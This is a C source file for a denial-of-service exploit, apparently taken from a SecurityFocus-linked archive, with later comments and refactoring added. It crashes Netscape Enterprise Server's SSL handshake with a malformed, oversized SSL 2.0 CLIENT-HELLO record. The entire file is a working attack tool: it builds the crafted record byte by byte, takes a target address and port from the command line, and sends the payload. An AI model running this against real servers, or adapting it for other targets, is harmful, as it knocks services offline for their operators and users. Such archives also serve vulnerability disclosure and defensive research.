
/*
source: https://www.securityfocus.com/bid/516/info

Netscape's Enterprise Server suffers from a buffer overflow error in the SSL
handshaking code that causes it to crash when the buffer is overrun.
*/

//
// nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se
//
// This program crashes Netscape Enterprise Server when it is
// running in SSL mode, by exploiting a bug in the SSL handshake
// code. The server crashes if the client:
//
// * starts with SSL 2.0 format
// * uses the long (three-byte) record header
// * uses padding >= 8
// * sends at least 11 bytes more data than it specifies in the
//   header
// * sends at least about 4 KB of data
//
// I haven't included any error handling in the code because it's
// so boring to write... ;o)
//
#include <winsock.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
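// Short aliases for the socket address types. These are typedefs rather
// than the original object-like macros: `#define sockaddr_in struct
// sockaddr_in` rewrites every later occurrence of the token, so writing
// `struct sockaddr_in` in full anywhere after this point (in this file or
// in any header included later) would expand to the invalid
// `struct struct sockaddr_in`. A typedef names the same type without that
// hazard and is a drop-in replacement for the existing uses below.
typedef struct sockaddr_in sockaddr_in;
typedef struct sockaddr sockaddr;

// Record parameters. Some combinations of these three constants will crash
// the server, others will not. They encode the conditions listed in the
// header comment: padding of at least 8, at least 11 more bytes on the wire
// than the record header declares, and a record of at least about 4 KB.
#define PADDING 8
#define SPECIFIED_SIZE 11822   // length written into the SSL 2.0 record header
#define ACTUAL_SIZE 11833      // bytes actually sent: SPECIFIED_SIZE + 11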
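// Parse a decimal TCP port from `text` into `*out`.
// Returns 0 on success, -1 if the text is empty, has trailing junk, or is
// outside 1..65535. strtoul() saturates to ULONG_MAX on overflow, which the
// range check rejects, so errno is not consulted. A leading '+' or
// whitespace is accepted by strtoul() and therefore by this function too.
static int parse_port(const char *text, unsigned short *out)
{
    char *end;
    unsigned long value;

    if (text == NULL || *text == '\0')
        return -1;
    value = strtoul(text, &end, 10);
    if (*end != '\0' || value == 0 || value > 65535)
        return -1;
    *out = (unsigned short)value;
    return 0;
}

// Fill `buf` with the malformed SSL 2.0 CLIENT-HELLO record this PoC sends.
// Returns the number of bytes to put on the wire (ACTUAL_SIZE), or 0 if
// `cap` is too small to hold it. Every byte not set explicitly is '.'; the
// original note is that "anything would do" for the filler.
//
// Layout (SSL 2.0 record layer with the three-byte "long" header):
//   [0..1]  record length, big-endian. The high bit of byte 0 is clear,
//           which selects the three-byte header form; the value written
//           (SPECIFIED_SIZE) is deliberately 11 bytes short of what is sent.
//   [2]     padding count. The header comment notes padding makes no sense
//           on an unencrypted record, but without it the server does not crash.
//   [3]     message type 0x01 = CLIENT-HELLO.
//   [4..5]  client version 3.0 (there will be no "later", though).
//   [6..7]  cipher-specs length = 12, i.e. four 3-byte cipher-kind entries.
//           (The original comment said 3; the bytes below are twelve.)
//   [8..9]  session-id length = 0.
//   [10..11] challenge length = 16.
//   [12..23] the four cipher-kind entries, kept verbatim from the original.
//   [24..39] 16 bytes of challenge data, which is the '.' filler.
//   the rest: more '.' filler up to ACTUAL_SIZE.
static size_t build_client_hello(unsigned char *buf, size_t cap)
{
    static const unsigned char header[] = {
        (SPECIFIED_SIZE & 0xff00) >> 8, SPECIFIED_SIZE & 0x00ff, PADDING,
        0x01,             // CLIENT-HELLO
        0x03, 0x00,       // version 3.0
        0x00, 0x0c,       // cipher-specs length = 12
        0x00, 0x00,       // session-id length = 0
        0x00, 0x10,       // challenge length = 16
        0x02, 0x00, 0x80, // cipher kinds, four 3-byte entries
        0x04, 0x00, 0x80,
        0x00, 0x00, 0x03,
        0x00, 0x00, 0x06,
    };

    if (buf == NULL || cap < ACTUAL_SIZE)
        return 0;
    memset(buf, '.', cap);
    memcpy(buf, header, sizeof header);
    return ACTUAL_SIZE;
}

// Send all `len` bytes of `buf` on `sock`, looping on short writes.
// Returns 0 when everything was sent, -1 on SOCKET_ERROR (the Winsock error
// code is left for the caller to read via WSAGetLastError()).
static int send_all(SOCKET sock, const unsigned char *buf, size_t len)
{
    size_t done = 0;

    while (done < len) {
        // send() takes an int length; len is bounded by the 64 KiB buffer.
        int sent = send(sock, (const char *)buf + done, (int)(len - done), 0);
        if (sent == SOCKET_ERROR)
            return -1;
        done += (size_t)sent;
    }
    return 0;
}

// Entry point. Connects to <ip-address>:<ssl-port> given on the command
// line and sends one malformed CLIENT-HELLO record.
//
// Changes from the original PoC:
//   * the target is no longer compiled in ("set to your own server and
//     nobody elses"); it is taken from argv so the binary cannot be pointed
//     at the wrong host by editing the wrong constant;
//   * every Winsock call is checked, and nothing is sent unless connect()
//     succeeded (the original printed a message and sent anyway);
//   * short sends are retried, and the exit status reports the outcome
//     (0 = record sent, 1 = usage or network error).
int main(int argc, char **argv)
{
    static unsigned char record[65536];   // 64 KiB; static keeps it off the stack
    WSADATA winSockData;
    sockaddr_in peer;
    SOCKET sock;
    unsigned short port;
    size_t record_len;
    int status = 1;

    printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n");

    if (argc != 3) {
        fprintf(stderr, "usage: %s <ip-address> <ssl-port>\n",
                argc > 0 ? argv[0] : "nesexploit");
        return 1;
    }
    if (parse_port(argv[2], &port) != 0) {
        fprintf(stderr, "bad port '%s' (expected 1-65535)\n", argv[2]);
        return 1;
    }

    // Zero the whole struct (covers sin_zero) instead of clearing it by hand.
    memset(&peer, 0, sizeof peer);
    peer.sin_family = AF_INET;
    peer.sin_port = htons(port);
    peer.sin_addr.s_addr = inet_addr(argv[1]);
    // inet_addr() cannot distinguish a parse failure from 255.255.255.255;
    // a broadcast address is not a useful target here, so reject both.
    if (peer.sin_addr.s_addr == INADDR_NONE) {
        fprintf(stderr, "bad IP address '%s' (dotted quad expected)\n", argv[1]);
        return 1;
    }

    if (WSAStartup(0x0101, &winSockData) != 0) {
        fprintf(stderr, "WSAStartup failed\n");
        return 1;
    }

    sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        fprintf(stderr, "socket() failed: %d\n", WSAGetLastError());
        goto out_cleanup;
    }

    if (connect(sock, (sockaddr *)&peer, sizeof peer) != 0) {
        printf("Ehmn, where's that server? ;o)\n\n");
        goto out_close;
    }

    record_len = build_client_hello(record, sizeof record);
    if (record_len == 0 || send_all(sock, record, record_len) != 0) {
        fprintf(stderr, "send() failed: %d\n", WSAGetLastError());
        goto out_close;
    }
    printf("Done!\n\n");
    status = 0;

out_close:
    closesocket(sock);
out_cleanup:
    WSACleanup();
    return status;
}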